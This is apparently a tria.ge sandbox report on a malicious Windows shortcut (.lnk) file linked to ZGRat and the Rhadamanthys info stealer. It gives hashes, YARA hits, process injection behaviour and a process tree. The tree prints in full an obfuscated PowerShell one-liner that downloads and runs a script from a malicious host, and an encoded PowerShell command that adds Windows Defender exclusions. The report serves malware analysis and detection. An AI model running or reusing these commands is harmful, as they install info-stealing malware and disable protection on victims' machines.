Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
48s -
max time network
42s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
06/05/2024, 13:51
Static task
static1
Behavioral task
behavioral1
Sample
51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk
Resource
win7-20240220-en
General
-
Target
51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk
-
Size
2KB
-
MD5
17dc01efda95cad71f3de00a136a6672
-
SHA1
7277a278d3c453adc868f5b27c2e937db3b0bf80
-
SHA256
51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a
-
SHA512
33daa7f80b2e230ffd83e9211aa818679be9c0450871002ae0dc1892601592140011897173094a9e68bc9b164562f712633b9c56f5e273d636889d6923779f48
Malware Config
Extracted
http://timecheck.ug/ppx.ps1
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral1/memory/2780-73-0x00000000051A0000-0x0000000005650000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-74-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-107-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-133-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-131-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-129-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-127-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-125-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-123-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-121-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-119-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-117-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-115-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-113-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-111-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-109-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-105-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-103-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-99-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-97-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-93-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-89-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-87-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-85-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-83-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-81-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-77-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-101-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-95-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-91-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-79-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2780-75-0x00000000051A0000-0x000000000564B000-memory.dmp family_zgrat_v1 behavioral1/memory/2360-4983-0x0000000004B40000-0x0000000004DF8000-memory.dmp family_zgrat_v1 behavioral1/memory/2668-9885-0x00000000022A0000-0x0000000002388000-memory.dmp family_zgrat_v1 -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2512 created 1196 2512 bvasdvdfsds.exe 21 PID 4324 created 1196 4324 dfgdvdfsds.exe 21 PID 3976 created 1196 3976 cvbfsds.exe 21 PID 2260 created 1196 2260 bvcfsds.exe 21 -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2664 powershell.exe -
pid Process 2664 powershell.exe 5224 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 2348 fhs.exe 2440 fhs.exe 2780 bvasdvdfsds.exe 2360 BLHisbnd.exe 2512 bvasdvdfsds.exe 2668 BLHisbnd.exe 7480 dfgdvdfsds.exe 4324 dfgdvdfsds.exe 5092 cvbfsds.exe 3976 cvbfsds.exe 1084 bvcfsds.exe 2260 bvcfsds.exe -
Loads dropped DLL 10 IoCs
pid Process 2440 fhs.exe 2780 bvasdvdfsds.exe 2780 bvasdvdfsds.exe 2360 BLHisbnd.exe 2440 fhs.exe 7480 dfgdvdfsds.exe 2440 fhs.exe 5092 cvbfsds.exe 2440 fhs.exe 1084 bvcfsds.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2440 fhs.exe 2440 fhs.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2348 set thread context of 2440 2348 fhs.exe 31 PID 2780 set thread context of 2512 2780 bvasdvdfsds.exe 36 PID 2360 set thread context of 2668 2360 BLHisbnd.exe 37 PID 7480 set thread context of 4324 7480 dfgdvdfsds.exe 41 PID 5092 set thread context of 3976 5092 cvbfsds.exe 48 PID 1084 set thread context of 2260 1084 bvcfsds.exe 51 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 2664 powershell.exe 2512 bvasdvdfsds.exe 2512 bvasdvdfsds.exe 3168 dialer.exe 3168 dialer.exe 3168 dialer.exe 3168 dialer.exe 4324 dfgdvdfsds.exe 4324 dfgdvdfsds.exe 4600 dialer.exe 4600 dialer.exe 4600 dialer.exe 4600 dialer.exe 5224 powershell.exe 3976 cvbfsds.exe 3976 cvbfsds.exe 4808 dialer.exe 4808 dialer.exe 4808 dialer.exe 4808 dialer.exe 2260 bvcfsds.exe 2260 bvcfsds.exe 1940 dialer.exe 1940 dialer.exe 1940 dialer.exe 1940 dialer.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2348 fhs.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2780 bvasdvdfsds.exe Token: SeDebugPrivilege 2780 bvasdvdfsds.exe Token: SeDebugPrivilege 2360 BLHisbnd.exe Token: SeDebugPrivilege 2360 BLHisbnd.exe Token: SeDebugPrivilege 2668 BLHisbnd.exe Token: SeDebugPrivilege 7480 dfgdvdfsds.exe Token: SeDebugPrivilege 7480 dfgdvdfsds.exe Token: SeDebugPrivilege 5092 cvbfsds.exe Token: SeDebugPrivilege 5092 cvbfsds.exe Token: SeDebugPrivilege 5224 powershell.exe Token: SeDebugPrivilege 1084 bvcfsds.exe Token: SeDebugPrivilege 1084 bvcfsds.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2348 fhs.exe 2440 fhs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2220 wrote to memory of 2664 2220 cmd.exe 29 PID 2220 wrote to memory of 2664 2220 cmd.exe 29 PID 2220 wrote to memory of 2664 2220 cmd.exe 29 PID 2664 wrote to memory of 2348 2664 powershell.exe 30 PID 2664 wrote to memory of 2348 2664 powershell.exe 30 PID 2664 wrote to memory of 2348 2664 powershell.exe 30 PID 2664 wrote to memory of 2348 2664 powershell.exe 30 PID 2348 wrote to memory of 2440 2348 fhs.exe 31 PID 2348 wrote to memory of 2440 2348 fhs.exe 31 PID 2348 wrote to memory of 2440 2348 fhs.exe 31 PID 2348 wrote to memory of 2440 2348 fhs.exe 31 PID 2348 wrote to memory of 2440 2348 fhs.exe 31 PID 2440 wrote to memory of 2780 2440 fhs.exe 34 PID 2440 wrote to memory of 2780 2440 fhs.exe 34 PID 2440 wrote to memory of 2780 2440 fhs.exe 34 PID 2440 wrote to memory of 2780 2440 fhs.exe 34 PID 2780 wrote to memory of 2360 2780 bvasdvdfsds.exe 35 PID 2780 wrote to memory of 2360 2780 bvasdvdfsds.exe 35 PID 2780 wrote to memory of 2360 2780 bvasdvdfsds.exe 35 PID 2780 wrote to memory of 2360 2780 bvasdvdfsds.exe 35 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2780 wrote to memory of 2512 2780 bvasdvdfsds.exe 36 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2360 wrote to memory of 2668 2360 BLHisbnd.exe 37 PID 2512 wrote to memory of 3168 2512 bvasdvdfsds.exe 38 PID 2512 wrote to memory of 3168 2512 bvasdvdfsds.exe 38 PID 2512 wrote to memory of 3168 2512 bvasdvdfsds.exe 38 PID 2512 wrote to memory of 3168 2512 bvasdvdfsds.exe 38 PID 2512 wrote to memory of 3168 2512 bvasdvdfsds.exe 38 PID 2512 wrote to memory of 3168 2512 bvasdvdfsds.exe 38 PID 2440 wrote to memory of 7480 2440 fhs.exe 40 PID 2440 wrote to memory of 7480 2440 fhs.exe 40 PID 2440 wrote to memory of 7480 2440 fhs.exe 40 PID 2440 wrote to memory of 7480 2440 fhs.exe 40 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 7480 wrote to memory of 4324 7480 dfgdvdfsds.exe 41 PID 4324 wrote to memory of 4600 4324 dfgdvdfsds.exe 42 PID 4324 wrote to memory of 4600 4324 dfgdvdfsds.exe 42 PID 4324 wrote to memory of 4600 4324 dfgdvdfsds.exe 42
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\51e431b4fa084108a9524d0467a925d518659ac886be3451ffe5ec86da707f4a.lnk2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Windo 1 $Yh=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal pv $Yh;$MP=((New-Object Net.WebClient)).DownloadString('http://timecheck.ug/ppx.ps1');pv $MP3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Public\fhs.exe"C:\Users\Public\fhs.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Users\Public\fhs.exe"C:\Users\Public\fhs.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2512
-
-
-
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:7480 -
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4324
-
-
-
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5092 -
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3976
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2260
-
-
-
-
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3168
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4808
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1940
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {358DFB76-3FB2-4E69-8998-7123B0E3BAD6} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:S4U:1⤵PID:2484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5224
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.3MB
MD5de08b70c1b36bce2c90a34b9e5e61f09
SHA11628635f073c61ad744d406a16d46dfac871c9c2
SHA256432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67
SHA51218a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5
-
Filesize
760KB
MD58333b78c2a3eacf8cfd843a7b62ce6ba
SHA181a4d7d00d04da14a6059ed068238a7e2321f721
SHA256aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665
SHA512c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27
-
Filesize
3.4MB
MD5e13e6f7986b9d1eff55fe30133592c40
SHA18299d50b76990e9dc7e0a8cc67e2f4d44cb810f5
SHA256407e9094206a37707a368f4cd0103269c50b8c0c03edba87b4f20664d259f207
SHA512bb41209d410ff38c01279d119f646658e363a3055a4f152b6a2c76b9cdb1fb42441b243fa8f7fb7a353a1b0e78c619e499274185f40d8592e43551da46bd97a6